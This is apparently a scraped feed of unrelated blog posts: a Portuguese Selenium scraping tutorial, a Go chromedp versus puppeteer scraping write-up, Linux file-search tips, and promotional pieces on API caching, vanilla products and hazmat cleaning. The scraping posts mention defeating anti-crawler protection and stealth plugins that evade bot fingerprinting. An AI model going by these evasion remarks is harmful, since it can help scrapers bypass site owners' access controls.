pip install beautifulsoup4
```
#### Instalação Pandas
A biblioteca Pandas oferece estruturas de dados de alto desempenho e funções para manipulação de dados, tornando os processos de análise e ciência de dados mais eficientes e intuitivos.
Para instalar a biblioteca do [Pandas](https://pypi.org/project/pandas/), você também pode usar o [pip](https://pypi.org/project/pip/).
```bash
pip install pandas
```
#### Download WebDriver
A ferramenta do Selenium usa Web Drivers para realizar atividades de automações. Um WebDriver é uma ferramenta usada para automatizar testes em navegadores web. Ele permite que desenvolvedores e testadores controlem um navegador (como Chrome, Firefox ou Safari) programaticamente, simulando a interação de um usuário real. Um dos WebDrivers mais populares é o Selenium WebDriver, que oferece suporte a diversos navegadores e linguagens de programação, como Python, Java e C#.
O [ChromeDriver](https://developer.chrome.com/docs/chromedriver?hl=pt-br) é um componente específico do Selenium WebDriver que permite controlar o navegador Google Chrome. Ele serve como uma ponte entre o Selenium WebDriver e o navegador, possibilitando que os testes automatizados sejam executados no Chrome.
Para fazer o download da ferramenta, é necessário acessar o [site de downloads do Google Chrome](https://googlechromelabs.github.io/chrome-for-testing/) e selecionar a versão de chromedriver compatível com seu Sistema Operacional.

*Versões Estáveis do Chrome Driver Disponíveis*
Após fazer o download do arquivo compactado correspondente, extraia os arquivos e guarde o local do arquivo chromedriver.exe, pois ele será usado posteriormente.
## Implementação
O primeiro passo da implementação do nosso projeto será a importação das bibliotecas que usaremos. Para isso, use o trecho de código a seguir. O trecho importa a BeautifulSoup, a biblioteca Selenium e a biblioteca Pandas.
```python
from bs4 import BeautifulSoup
from selenium.webdriver.chrome.service import Service
from selenium import webdriver
import pandas as pd
```
Com as bibliotecas importadas, podemos configurar nosso web driver para acessar páginas da internet. Para a configuração, o construtor do [Selenium WebDriver](https://www.selenium.dev/documentation/webdriver/browsers/chrome/) precisa de um [serviço - Service](https://www.selenium.dev/documentation/webdriver/drivers/service/), que é usado para configurar e gerenciar o serviço do WebDriver para o Chrome, como especificar o caminho para o executável do ChromeDriver e definir argumentos adicionais; e opções para a instância do navegador Chrome. Dessa forma, no trecho abaixo, estamos configurando e instanciando nosso objeto responsável pela obtenção e manipulação da página.
```python
chrome_options = webdriver.chrome.options.Options()
chrome_driver = "endereco/do/arquivo/chromedriver.exe"
service_to_pass = Service(executable_path=chrome_driver)
wd = webdriver.Chrome(service=service_to_pass, options=chrome_options)
```
Agora, iremos realizar a ação necessária para obter dados da página que desejamos. Para isso, utilizaremos o método [get()](https://www.selenium.dev/documentation/webdriver/interactions/navigation/) do objeto criado. O método get é responsável por abrir o website. Posteriormente, utilizaremos a propriedade do objeto WebDriver chamada [page_source](https://selenium-python.readthedocs.io/api.html#selenium.webdriver.remote.webdriver.WebDriver.page_source), que nos dá acesso ao código-fonte (conteúdo) da página em questão.
Além disso, será necessário determinar o endereço da página que se deseja acessar. No projeto, usei o website [www.whoscored.com](https://www.whoscored.com/), especificamente sua página sobre [estatísticas](https://www.whoscored.com/Statistics). Este website possui proteção anti-crawler e, por isso, utilizando-a como teste, podemos notar a efetividade da ferramenta.

*Página Acessada no Tutorial*
```python
URL_BASE = "https://www.whoscored.com/Statistics"
wd.get(URL_BASE)
soup_file = wd.page_source
```
Após esse trecho, já podemos acessar todo o código HTML da página web. Podemos utilizar essa informação para testes, análises ou transformações necessárias. Ainda, podemos usar o WebDriver para preencher formulários, clicar em botões ou navegar entre páginas. Para o projeto atual, irei propor apenas a limpeza da informação não estruturada presente na página e sua transformação em dados estruturados.
Para isso, usaremos as bibliotecas Pandas e BeautifulSoup importadas anteriormente. Caso você tenha dificuldades em acompanhar o código a seguir, indico buscar meu tutorial de [Introdução ao WebScraping](https://dev.to/lisandramelo/recebendo-informacoes-do-transfermarkt-uma-introducao-ao-web-scraping-188o), já que ele introduz cada uma das funções usadas a seguir.
A primeira parte do tratamento consiste em passar o código-fonte pelo analisador de HTML da BeautifulSoup.
```python
soup_page = BeautifulSoup(soup_file, "html.parser")
```
Agora, iremos buscar os dados que desejamos. No projeto, iremos obter dados da tabela destacada abaixo. São dados sumarizados com os 20 melhores clubes de acordo com as notas designadas pelo site.

*Tabela a ser Acessada*
Primeiro, acessaremos a tabela escolhida no HTML pelo seu ID.
```python
main_table = soup_page.find('div', {'id': 'top-team-stats-summary'})
team_sum_stats_table = main_table.find('table', {'id': 'top-team-stats-summary-grid'})
```
Agora, dentro da tabela, conseguiremos os nomes de colunas existentes.
```python
team_sum_stats_header = team_sum_stats_table.find_all('th')
header_columns = [column_name.text for column_name in team_sum_stats_header]
```
Note que o código acima usa [List Comprehension](https://www.w3schools.com/python/python_lists_comprehension.asp). Esse tipo de recurso usa uma sintaxe mais limpa e simples para criar listas a partir de outras listas. Dessa forma, o código acima é equivalente ao proposto abaixo.
```python
team_sum_stats_header = team_sum_stats_table.find_all('th')
header_columns = []
for column_name in team_sum_stats_header:
header_columns.append(column_name.text)
```
Agora, vamos obter os dados de células da nossa tabela. Para isso, use o código abaixo.
```python
team_sum_stats_body = team_sum_stats_table.find('tbody').find_all('tr')
teams_stats = [[cell_value.text for cell_value in row.find_all('td')] for row in team_sum_stats_body]
```
Dessa vez, o código possui duas list comprehensions aninhadas. Talvez pareça complexo, mas na realidade, o código proposto faz o mesmo que o código abaixo.
```python
teams_stats = []
for row in team_sum_stats_body:
cells = row.find_all('td')
row_values = []
for cell_value in cells:
row_values.append(cell_value.text)
teams_stats.append(row_values)
```
Agora, já temos nossas colunas e nossas linhas de valores. Podemos então criar nosso DataFrame com informações estruturadas que estavam presentes no site. Para isso, use o código abaixo.
```python
df_sum = pd.DataFrame(teams_stats, columns=header_columns)
print(df_sum.head())
```
O código resultará nos cinco primeiros registros da tabela do site como a imagem abaixo.

*Resultado do Nosso Código*
## Repositório
O código completo do projeto está no meu [repositório do github](https://github.com/veronicamars73/Getting-WhoScored-Data).
## Considerações Finais
Espero que o tutorial ajude de alguma forma. Encorajo que implementem suas próprias versões e fico à disposição para ajudar como puder.
Deixo meu e-mail [lisandramelo34@gmail.com](mailto:lisandramelo34@gmail.com) e meu perfil no [LinkedIn](https://www.linkedin.com/in/melo-lisandra) caso desejem entrar em contato. | lisandramelo |
1,879,682 | Resilis: Global Low Latency APIs | Optimizing API performance for low latency and cost-effectiveness is critical in ensuring a seamless... | 0 | 2024-06-06T22:00:02 | https://dev.to/resilis/resilis-global-low-latency-apis-7l1 | Optimizing API performance for low latency and cost-effectiveness is critical in ensuring a seamless user experience and maximizing operational efficiency. While traditional methods like centralized caching and database optimizations are effective, they can become complex and expensive with user growth. Resilis addresses this challenge by using edge optimization and caching strategies to optimize API performance. You can think of this as a globally distributed reverse proxy strategy or simply as a CDN for real-time data. With over 300 global edge locations, Resilis improves API performance and security by processing requests closer to users.
Resilis offers a comprehensive edge-based solution that guarantees fast and cost-effective API performance, delivering a secure, globally low-latency experience with enhanced DDoS attack protection. It also provides real-time insights and location-specific performance monitoring, along with mutation-based cache invalidation for handling dynamic API data. Resilis also features simple integration with Open API and Postman collections.
Additionally, Resilis incorporates [asynchronous request processing](https://resilis.io/docs/concepts/asynchronous-requests). This method effectively handles high-traffic scenarios for appropriate write requests, keeping response times fast and further reducing costs by optimizing server use under heavy loads.
## When and Why You Need Resilis
1. **Handling Traffic Surges:** Ensures fast and cost-effective API performance during peak traffic times, preventing slowdowns and crashes.
2. **High-Traffic API Optimization:** Delivers low latency and cost savings for systems with heavy API usage, improving user experience.
3. **Speedy Content Delivery:** Accelerates and reduces the cost of API calls in content management systems, enhancing content distribution.
4. **Location-Aware Performance Monitoring:** Provides real-time insights into API performance based on location, ensuring optimal performance for users across different regions. The edge-based architecture enables accurate and efficient monitoring.
5. **Robust Security and DDoS Protection:** Implements advanced security measures and DDoS protection to safeguard API endpoints and infrastructure, ensuring uninterrupted service and data integrity. Performance monitoring includes security metrics to detect and mitigate potential threats.
6. **Blockchain Data Access:** Resilis optimizes access to immutable blockchain transaction data through efficient caching, reducing latency and network load for blockchain companies.
## Use Cases
Let’s examine these two unique scenarios:
**Business A**:
You run a large e-commerce online retail store, and your major sales events (Black Friday, discount sales, etc.) are approaching. During these peak times, your API will need to handle three to ten times the normal request load. To avoid server crashes, slow processing times, and reduced conversion rates due to a sluggish website, your API must be highly performant and responsive.
A poor user experience can have significant negative impacts on your business. Server crashes can lead to extended downtime, making your site inaccessible and causing potential revenue loss. Slow processing times frustrate users, leading to abandoned carts and a decline in customer satisfaction. Lower conversion rates can occur because customers are less likely to complete purchases on a slow or unresponsive site. In the competitive landscape of online retail, especially during high-stakes sales events, any delay or technical issue can drive customers to competitors.
**Business B**:
You have an app that enables forex traders to place trades, and access liquidity pools and other financial market features. Events and occasions drive traffic to applications like this, resulting in peak hours in the API request chart. These events are not anticipated, unlike the sales day in the previous use case. You will need a battle-tested technology that handles unexpected peak hours for your application when it is least expected and that is where Resilis comes in.
Resilis balances your app requests in both scenarios across edge servers in all relevant regions, Resilis delivers faster responses, readily available data, and reduced API call costs, providing a seamless experience even during peak traffic. This ensures that your customers enjoy a fast, reliable shopping experience, maximizing your sales opportunities and customer satisfaction.
## How to Setup with Resilis
Currently, we support importing your Open API specifications or your Postman Collection to Resilis, and our technology will automatically engineer your API to give optimal results with edge technology.
We have made these detailed and simple guides for you to follow while setting up Resilis:
- [Postman Setup Guide](https://resilis.io/docs/guides/setup-with-postman)
- [OpenAPI Setup Guide](https://resilis.io/docs/guides/setup-with-openapi)
### [Join our public beta](https://app.resilis.io) | samuelagm | |
1,879,379 | Gopherizing some puppeteer code | Why? As developers we sometimes get a bad case of the shiny new object syndrome. I hate to... | 27,861 | 2024-06-06T22:00:00 | https://artur.wtf/blog/using-go-chromedp/ | go, scraping, chrome, automation | ## Why?
As developers we sometimes get a bad case of the shiny new object syndrome. I hate to say it but every time I start hacking on something new, the urge to add something new is quite overwhelming. It is really tough to keep an interest in projects for a long time and it starts to become tedious the deeper you go into the weeds. I suppose this is why people list `growth` as one of their top motivations.
I consider that anything new is an opportunity for growth, and doing something over and over in a similar manner quickly becomes a tedious. I've been building various types of scrapers since 2011, and it all started because I wanted to automate a workflow and save myself some time. The time spent on automating this was probably more than if I had done this by hand but it was interesting interacting via `http` from code and crunching the data automatically.
The amount of data on the web is pretty crazy, you have various sources and multiple types of data that can be combined in very interesting ways. Back in those days dropshipping was becoming huge and people were performing arbitrage across Amazon/Ebay/local flea-markets etc.. Tools that were able to perform analytics across these shops were quite trendy, and the market was slightly less crowded, so for me building crawlers seemed like a nice idea to build out a good customer base.
Nowadays due to `RAG` systems, gathering data automatically, breaking it down and feeding it into embedding models and storing it in vector databases for `LLM` information enhancement has come back into the spotlight. In between then and now there have been a few changes in the way data is served up for consumption. Off the top of my head:
- single page apps have gained huge traction, most everyone turning to building their content in a `js` bundle, loading everything on the fly as the page loads
- websites have become fussy about having their data used by unknown parties, so they have been closing down access and have become very litigious(#TODO: maybe add some cases of court cases Linkedin vs those guys, Financial Times vs OpenAI)
- bot detection and prevention - this one is funny since it is like a flywheel, it built 2 lucrative markets overnight - bot services and anti bot protection
- TBH, it's difficult to predict where this might be heading, it kind of feels like people have been aiming to move all their datas into data centers but since data is becoming so guarded...will they move back to paper?

Because of `SPAs` and the wide adoption of `js` in websites it is much more convenient to use some sort of browser automation to crawl pages and extract the information. This makes it less prone to badgering the servers, and having to reverse engineer the page content loading, so you will probably want to use either a [`chrome developer tools protocol`](https://chromedevtools.github.io/devtools-protocol/) or [`webdriver`](https://www.w3.org/TR/webdriver/) flavored communications protocol with the browser. Back in the day IIRC I have also used the [`PyQt`](https://www.riverbankcomputing.com/software/pyqt/intro) bindings for acessing the `Qt` browser component but nowadays its mostly straight-up browsers.
These days my goto is `puppeteer`. It's a weird tool that can be easily be used to scrape data from pages. The reason I say it is weird is mainly due to the deceiving nature of the internals, essentially using two `js` engines that communicate via the `cdp` protocol that is a a very dense beast and does not play nice with complex objects.
Recently it has become more appealing to me to use strongly typed languages. This is probably because I have started to narrow down my experiments to very small code samples that illustrate one thing at time. I would go as far as to call it experiment driven development. Duck typing is fun as you can print pretty much anything you want. I was thinking to use `rust` but it has a very tough learning curve. Node is pretty nice with `mjs` but it's confusing sometimes when it crosses over between the two event loops, also while it is good for communicating on `cdp` it is not really designed for sync code and `python` is a bit boring for me so I decided to look at `go`. Since it is a google language I expected it to have decent support for cdp, and the learning curve is slightly gentler than `rust`.
## How?
Looking at the alternatives there are two that stand out [`chromedp`](https://github.com/chromedp/chromedp) and [rod](https://go-rod.github.io/#/). Rod looks like it is the prodigal son of [`behave`](https://behave.readthedocs.io/en/latest/) and [`cucumber`](https://cucumber.io/) some well established BDD frameworks. Personally I am not finding the `MustYaddaYadda...` very readable and combining it with other custom APIs would probably make it become inconsistent. It has a few nice things in the way it abstracts `iframes` but I am just unable to go past the higher level API.
In the end I wound up choosing `chromedp`. It works pretty well for most use cases, there are some places where it doesn't quite cut it and I wish it did, but by now I have come to terms there is no one technology to rule them all, wouldn't it be nice if that existed?
You can install it via `go get -u github.com/chromedp/chromedp` and then you can start using it in your code. It has quite a few submodules and related projects that you may want to use depending on your concrete use case.
Generally if your use case is only data extraction and you have no tricky actions to deal with(page is _bot resistant_, some elements are loaded at later times, `iframe` hell etc...).
```go
import (
"context"
"log"
"time"
"github.com/chromedp/chromedp"
"github.com/chromedp/cdproto/cdp"
// for slightly more advanced use cases
"github.com/chromedp/cdproto/browser"
"github.com/chromedp/cdproto/dom"
"github.com/chromedp/cdproto/storage"
"github.com/chromedp/cdproto/network"
)
```
## The pleasant surprises
Well, calling them surprises is a bit of a stretch, I have been `golang` over the years and I have to admit it is a pretty nice ecosystem and language.
`chromedp` automates chrome or any binary that you are able to communicate with via [`cdp`](https://github.com/chromedp/chromedp/blob/ebf842c7bc28db77d0bf4d757f5948d769d0866f/allocate.go#L349). The API is somewhat intuitive, haven't found myself diving into the guts of it very often to figure out how stuff works. The good part is that once you extract the data from the nodes you are interested in you can map it to go structs and make use of the go typing system.
For example you can grab a list of elements via selector:
```go
var productNodes []*cdp.Node
if err := chromedp.Run(ctx,
// visit the target page
chromedp.Navigate("https://scrapingclub.com/exercise/list_infinite_scroll/"),
chromedp.Evaluate(script, nil),
chromedp.WaitVisible(".post:nth-child(60)"),
chromedp.Nodes(`.post`, &productNodes, chromedp.ByQueryAll),
); err != nil {
log.Fatal("Error while trying to grab product items.", err)
}
```
then map each element to a struct
```go
for _, node := range productNodes {
if err := chromedp.Run(ctx,
chromedp.Text(`h4`, &name, chromedp.ByQuery, chromedp.FromNode(node)),
chromedp.Text(`h5`, &price, chromedp.ByQuery, chromedp.FromNode(node)),
); err != nil {
log.Fatal("Error while trying to grab product items.", err)
}
products = append(products, Product{name: name, price: price})
}
```
Another nice perk is that go is built with concurrency in mind so crunching the extracted data can be a lot more performant than in puppeteer.
Yet another pretty nifty thing I found is that you can deliver a binary that can be compiled for multiple platforms and can be distributed easily. This is a huge plus given that you may not really know who the user of the tool might be in the end.
## The ugly parts
The way to communicate with the browser is still through the `cdp` protocol and sometimes you need to pass objects only objects that can be serialized.
If you need to work with objects that can't be serialized you will need to inject `js` into the page context and interact with it.
When you have a page that contains `iframes` it is problematic to trigger events on the elements inside them. You can extract data from it but triggering events gets messy as you need `js` for that.
An example of how you might extract data from an `iframe` might look something like this:
```go
var iframes []*cdp.Node
if err := chromedp.Run(ctx, chromedp.Nodes(`iframe`, &iframes, chromedp.ByQuery)); err != nil {
fmt.Println(err)
}
if err := chromedp.Run(ctx, chromedp.Nodes(`iframe`, &iframes, chromedp.ByQuery, chromedp.FromNode(iframes[0]))); err != nil {
fmt.Println(err)
}
var text string
if err := chromedp.Run(ctx,
chromedp.Text("#second-nested-iframe", &text, chromedp.ByQuery, chromedp.FromNode(iframes[0])),
); err != nil {
fmt.Println(err)
}
```
But in order to trigger events on elements inside the iframe you can't just use the `chromedp` API, and since `chromedp.Evaluate` does not take a `Node` as context you will need to perform all the actions in `javascript` and that will make the resulting code a bit of a mishmash of `go` and `js`.
`puppeteer` also has some extra packages that can be used like `puppeteer-stealth` but `chromedp` does not seem to have an equivalent for that at this time. The `rod` package has [`rod stealth`](https://github.com/go-rod/stealth) but I haven't tried it since the API is not to my liking.
The other slightly dissappointing missing feature is that when running in headless mode all the GPU features are disabled because it is running in a [`headless-chrome`](https://github.com/chromedp/docker-headless-shell) container which does not have a display server. Puppeteer is able to run with GPU features enabled allowing it to pass the [`webgl fingerprinting`](http://bot.sannysoft.com/) tests.
## Conclusion
- in some ways puppeteer is still better than `chromedp`, working with `iframes` falls short
- `rod` is a nice alternative but its API looks like it was designed for testing, reminds me of `cucumber`
- `chromedp` is a nice alternative to `puppeteer` if you are looking to build a binary that can be distributed easily
- it is a bit more performant than `puppeteer` due to the concurrency model in `go`
| adaschevici |
1,854,415 | Dev: Machine Learning | A Machine Learning Developer is a specialized professional who leverages machine learning algorithms... | 27,373 | 2024-06-06T22:00:00 | https://dev.to/r4nd3l/dev-machine-learning-f9a | machinelearning, developer | A **Machine Learning Developer** is a specialized professional who leverages machine learning algorithms and techniques to build intelligent systems and applications that can learn from data and make predictions or decisions without being explicitly programmed. Here's a detailed description of the role:
1. **Understanding of Machine Learning Concepts:**
- Machine Learning Developers possess a strong understanding of machine learning concepts, including supervised learning, unsupervised learning, reinforcement learning, deep learning, and neural networks.
- They are familiar with various machine learning algorithms such as linear regression, logistic regression, decision trees, random forests, support vector machines (SVM), k-nearest neighbors (KNN), clustering algorithms, and neural network architectures.
2. **Data Preprocessing and Feature Engineering:**
- Machine Learning Developers preprocess raw data by cleaning, transforming, and normalizing it to prepare it for model training.
- They perform feature engineering to extract relevant features from the data, select or engineer new features, and encode categorical variables for input into machine learning models.
3. **Model Selection and Training:**
- Machine Learning Developers select appropriate machine learning models based on the nature of the problem, dataset size, and performance requirements.
- They train machine learning models using labeled data (in supervised learning) or unlabeled data (in unsupervised learning) to optimize model parameters and minimize prediction errors.
4. **Evaluation and Model Performance Metrics:**
- Machine Learning Developers evaluate the performance of machine learning models using appropriate evaluation metrics such as accuracy, precision, recall, F1 score, ROC-AUC, mean squared error (MSE), and R-squared.
- They analyze model performance on training and validation datasets, detect overfitting or underfitting, and fine-tune model hyperparameters to improve performance.
5. **Deep Learning and Neural Networks:**
- Machine Learning Developers specialize in deep learning techniques and neural network architectures for tasks such as image recognition, natural language processing (NLP), speech recognition, and time series prediction.
- They design and implement convolutional neural networks (CNNs) for image classification, recurrent neural networks (RNNs) for sequential data processing, and transformer models for NLP tasks.
6. **Model Deployment and Integration:**
- Machine Learning Developers deploy trained machine learning models into production environments, integrating them with existing systems, applications, or APIs for real-time inference.
- They use deployment technologies such as Docker, Kubernetes, Flask, Django, or serverless platforms to create scalable and reliable machine learning pipelines and services.
7. **Continuous Model Monitoring and Maintenance:**
- Machine Learning Developers monitor deployed machine learning models for performance degradation, concept drift, or data drift over time.
- They retrain models periodically with new data, update model parameters, or reevaluate model assumptions to ensure continued accuracy and reliability.
8. **Interdisciplinary Skills:**
- Machine Learning Developers possess interdisciplinary skills in mathematics, statistics, computer science, and domain-specific knowledge relevant to the application area.
- They collaborate with data scientists, domain experts, software engineers, and business stakeholders to understand requirements, define success criteria, and deliver effective machine learning solutions.
9. **Ethical Considerations and Responsible AI:**
- Machine Learning Developers adhere to ethical guidelines and principles in machine learning and AI development, ensuring fairness, transparency, and accountability in model design and deployment.
- They address ethical concerns related to bias, privacy, security, and unintended consequences of machine learning systems, incorporating ethical considerations into the entire machine learning lifecycle.
10. **Continuous Learning and Skill Development:**
- Machine Learning Developers stay updated on the latest advancements in machine learning research, algorithms, frameworks, and tools.
- They participate in online courses, workshops, conferences, and research publications to enhance their knowledge and skills in machine learning and AI technologies.
In summary, a Machine Learning Developer plays a crucial role in designing, developing, and deploying machine learning models and systems that leverage data-driven insights to solve complex problems and improve decision-making processes across various domains and industries. By combining expertise in machine learning algorithms, data preprocessing, model evaluation, deployment, and continuous improvement, they drive innovation and create value through intelligent applications of AI technology. | r4nd3l |
1,879,680 | Discover the Essence of Indonesian Vanilla: Centralsun Vanilla Powder and Vanilla Seeds | Vanilla, often referred to as the "queen of spices," is a beloved ingredient around the globe,... | 0 | 2024-06-06T21:54:23 | https://dev.to/machik99/discover-the-essence-of-indonesian-vanilla-centralsun-vanilla-powder-and-vanilla-seeds-5269 | Vanilla, often referred to as the "queen of spices," is a beloved ingredient around the globe, revered for its unique aroma and rich flavor. Among the various sources of vanilla, Indonesia stands out as a premier producer, known for its high-quality and pure vanilla products. Centralsun, a brand committed to delivering the finest natural products, offers two exceptional vanilla offerings: Vanilla Powder and Vanilla Seeds. Both sourced from the lush landscapes of Indonesia, these products encapsulate the true essence of vanilla, providing a versatile and delectable addition to any culinary creation. In this blog post, we will explore the remarkable qualities and uses of [Centralsun's Vanilla Powder](https://centralsun.com/product/vanilla-powder/) and [Vanilla Seeds](https://centralsun.com/product/vanilla-seeds-50g/), and why they are a must-have in your kitchen.
The Origin of Centralsun Vanilla
Indonesia, an archipelago with a rich biodiversity and ideal climatic conditions, is one of the world's leading producers of vanilla. The country's fertile soil and tropical weather create the perfect environment for growing vanilla orchids, the source of this precious spice. Centralsun takes pride in sourcing their vanilla directly from Indonesian farmers, ensuring that every product embodies the highest quality and authenticity. By supporting sustainable farming practices and fair trade, Centralsun not only delivers superior products but also contributes to the well-being of local communities.
Centralsun Vanilla Powder: Pure, Potent, and Versatile
Purity and Quality
Centralsun Vanilla Powder is made from 100% pure vanilla beans, finely ground to create a potent and aromatic powder. Unlike synthetic vanilla flavorings or extracts, this powder contains no additives, preservatives, or artificial ingredients. The purity of Centralsun Vanilla Powder is evident in its intense aroma and deep, complex flavor, which is derived from the natural compounds found in vanilla beans.
Versatile Culinary Uses
Vanilla Powder is a versatile ingredient that can enhance a wide range of dishes, from sweet to savory. Its concentrated flavor means that a small amount goes a long way, making it an economical choice for home cooks and professional chefs alike.
Baking: Vanilla powder is a baker's delight. It can be added to cakes, cookies, muffins, and pastries to impart a rich, vanilla flavor without the need for liquid extracts. This makes it particularly useful in recipes where additional liquid might alter the desired consistency.
Beverages: Stir a pinch of vanilla powder into your coffee, tea, smoothie, or hot chocolate for a delightful twist. Its ability to dissolve easily makes it a perfect addition to both hot and cold drinks.
Savory Dishes: Surprisingly, vanilla can also complement savory dishes. Add a touch of vanilla powder to sauces, marinades, or spice rubs for a unique and aromatic depth of flavor.
Homemade Vanilla Sugar: Create your own vanilla sugar by mixing vanilla powder with granulated sugar. This can be used to sweeten baked goods, beverages, or sprinkled over fresh fruit.
Health Benefits
Apart from its delightful flavor, vanilla powder also offers several health benefits. Vanilla is known for its antioxidant properties, which help combat free radicals and reduce inflammation. Additionally, the aroma of vanilla has been linked to mood enhancement and stress relief, making it a perfect addition to a relaxing cup of tea or a comforting dessert.
Centralsun Vanilla Seeds: A Burst of Authentic Flavor
Authentic and Exotic
Centralsun Vanilla Seeds are the tiny black seeds found inside the vanilla pod. These seeds are meticulously harvested from the finest Indonesian vanilla beans, ensuring that they are of the highest quality. The seeds have a more intense flavor compared to vanilla extract, providing a burst of authentic vanilla taste in every bite.
Culinary Magic
Vanilla seeds are a chef's secret weapon, capable of transforming ordinary dishes into extraordinary culinary experiences.
Desserts: Vanilla seeds are often used in desserts like crème brûlée, panna cotta, and ice cream. The visual appeal of the tiny black seeds, combined with their powerful flavor, elevates these classic desserts to new heights.
Baking: Incorporate vanilla seeds into your cake and cookie recipes for a more pronounced vanilla flavor. The seeds disperse evenly throughout the batter, ensuring that every bite is infused with vanilla goodness.
Custards and Puddings: Vanilla seeds can be added to custards and puddings, imparting a deep, rich flavor and a speckled appearance that indicates the presence of real vanilla.
Fruit Compotes: Add vanilla seeds to fruit compotes or jams for an exotic twist. The seeds blend beautifully with the fruit, enhancing its natural sweetness and adding a layer of complexity.
Health Benefits
Like vanilla powder, vanilla seeds are rich in antioxidants and possess anti-inflammatory properties. They are also known to aid in digestion and have been used traditionally to alleviate stomach discomfort. Additionally, the sweet, comforting aroma of vanilla seeds can have a calming effect, promoting relaxation and well-being.
Why Choose Centralsun?
Centralsun is dedicated to providing products that are not only of the highest quality but also ethically sourced and environmentally friendly. Here are a few reasons why Centralsun Vanilla Powder and Vanilla Seeds stand out:
Sustainability: Centralsun works closely with Indonesian farmers to ensure sustainable farming practices. This not only protects the environment but also supports the livelihoods of local communities.
Purity: Both the vanilla powder and seeds are free from additives, preservatives, and artificial ingredients, ensuring that you get nothing but pure, natural vanilla.
Quality: The meticulous sourcing and production processes guarantee that every product meets the highest standards of quality and flavor.
Versatility: Whether you're a home cook or a professional chef, Centralsun's vanilla products offer endless culinary possibilities, allowing you to create dishes that are both delicious and memorable.
Conclusion
Centralsun's Vanilla Powder and Vanilla Seeds are exceptional products that bring the true essence of Indonesian vanilla to your kitchen. Their purity, quality, and versatility make them invaluable ingredients for a wide range of culinary creations. By choosing Centralsun, you are not only enhancing your cooking but also supporting sustainable practices and fair trade. So, whether you're baking a batch of cookies, crafting a gourmet dessert, or simply enjoying a cup of vanilla-infused coffee, let the rich, aromatic flavor of Centralsun's vanilla products elevate your culinary experience to new heights.
| machik99 | |
1,879,678 | What Are the Benefits of Hazmat Cleaning Services? | Services for hazmat cleaning provide many important advantages for handling hazardous materials... | 0 | 2024-06-06T21:51:23 | https://dev.to/bio_hazards_2766c0590308e/what-are-the-benefits-of-hazmat-cleaning-services-4nfm | Services for hazmat cleaning provide many important advantages for handling hazardous materials safely. First, these services use qualified workers with specific tools and training to grip and dispose of dangerous resources in a way that safeguards the atmosphere and public well-being. Another, hazmat cleaning lowers the opportunity of facing legal upshots by guaranteeing adherence to rigorous rules and specifications recognized by regulatory bodies. These facilities also lessen the option of mishaps or wounds and stop the spread of pollution. Professionals with experience in hazmat housework can help people and organizations reduce risks, support safety regulations, and assurance that hazardous resources are managed properly.
Complete Cleaning Solutions for All Circumstances
Mould Cleaning Services and Soot Cleaning Services : Together mould and soot can extremely harm one's health and reason property injury. Our mould removal facilities stop the development of mould and efficiently remove stubborn stains and residue, sendoff a clean and safe environment.
Mould Removal Services and Forensic Cleaning Services: Our specialists use cutting-edge methods and tools to entirely eliminate mould colonies for complete mould removal. Comparable to how we handle sensitive circumstances with tact and discretion, our forensic cleaning amenities pledge complete cleanup and restoration.
Hazmat Cleaning Services & After Accident Cleaning Services : Hazmat cleaning services securely handle and dispose of hazardous resources. In order to minimize disruption and maintain sanitation and safety, our cleaning amenities quickly return injured areas to their pre-accident state following chances.
After Fall and Injury Cleaning & Bio Cleanup, Remedial and Restoration: Our cleaning facilities offer quick and complete cleanup next falls or injuries, effectively treatment spills of blood and bodily fluids. Moreover, by carefully handling biohazardous resources, our bio cleanup, remediation, and refurbishment services return environments to a clean and safe state.
Disaster cleaning services and homicide cleaning services: Following tragic incidents such as homicides, we provide careful and kind cleaning, restoring impacted areas with tact and expertise. Our disaster cleaning services also offer thorough cleanup solutions and quick response times in the event of a natural or man-made disaster.
Mouse droppings cleaning services and antiviral sanitization services: By successfully getting rid of bacteria and viruses, we can create a clean, hygienic atmosphere. In order to prevent health risks, our mouse droppings cleaning services also handle rodent infestations, removing droppings and sanitising affected areas.
Allergy Clean Up Services & Nicotine, Tobacco and Smoke Odour Removal and Cleaning Services : Effective allergen targeting is achieved by allergy clean-up services, which relieve allergy symptoms. Furthermore, unpleasant odours are eliminated by our cleaning and odour removal services for nicotine, tobacco, and smoke, giving indoor spaces a fresh new look.
Finally, our wide range of specialised cleaning services is intended to successfully handle a variety of circumstances and risks. We guarantee comprehensive and expert restoration of impacted areas, from forensic and hazmat cleaning to soot and mould removal. We offer bio cleanup and remediation in addition to accident, fall and injury cleanup. We manage delicate situations with empathy and effectiveness because of our experience with homicide and disaster cleanup. In addition, by keeping our clients' environments clean and safe, our antiviral sanitization, mouse droppings, allergy cleanup, and nicotine, tobacco, and smoke odour removal services promote health and well-being.
| bio_hazards_2766c0590308e | |
1,874,732 | Mastering Linux: Easy Tips for Locating Files Folders and Text | Introduction I see a world where every device will utilize Linux in the nearest future.... | 0 | 2024-06-06T21:50:51 | https://dev.to/oluwatobi2001/mastering-linux-easy-tips-for-locating-files-folders-and-text-1gnc | linux, file, search, grep | ## Introduction
I see a world where every device will utilize Linux in the nearest future. It’s currently the driving force for open-source development globally and it’s cemented its relevance in today’s world as it is the backbone of many applications and services. Apt knowledge of the use of this operating system and ability to execute programs with it gives the developer an advantage.
This article which is the first of many, serves as to guide the developer on how to perform basic search commands using Linux. This is needed to locate file directories and texts.
As a popular programmer stated, the best way to learn Linux is to use it. Having Linux installed and running is a prerequisite to this tutorial so facilitate easy comprehension and practice. With this completed, let’s get started.
## Linux search commands
Searching for files can be cumbersome and complex for the newbie Linux user especially as it’s a sharp contrast from the Windows OS. Thankfully, newer Linux distros include beautiful graphical user interfaces to enhance user interaction and experience on Linux but still, the mastery of Linux search commands via the command line is still relevant, hence the need for this tutorial. Right now we will be introducing the various Linux commands that are used in files and text searches. They include
- Locate
- find
- Grep
The find and locate commands are specifically designed in the search for files and directories within the Linux file system while the Grep is more suited to locate texts within various text files in the Linux file system. Details regarding their use cases and relevant examples will be provided in the subsequent sections.
## Locate command
This command alongside the find command mentioned earlier is used to search for files using the file names within the Linux file system directories but how is this command different from the find command seeing that they are quite synonymous?
Firstly, the Locate command is executed to locate the details of a file being searched from a database of filenames which is updated automatically daily.
This implies it has a faster search time than the find command. However, it has a minor flaw in that the data only gets updated at a specified time daily or when executed. Hence files saved after the database has been updated at a particular time won’t be shown in the search results.
Here is a command to search for the file `“laptop.txt”` using locate.
`Locate laptop `

As you an see, the file name is been searched from the `plocate db` which doesn't have the file name indexed.
With that, we have successfully discussed the locate command. Up next is the find command
## Find Command
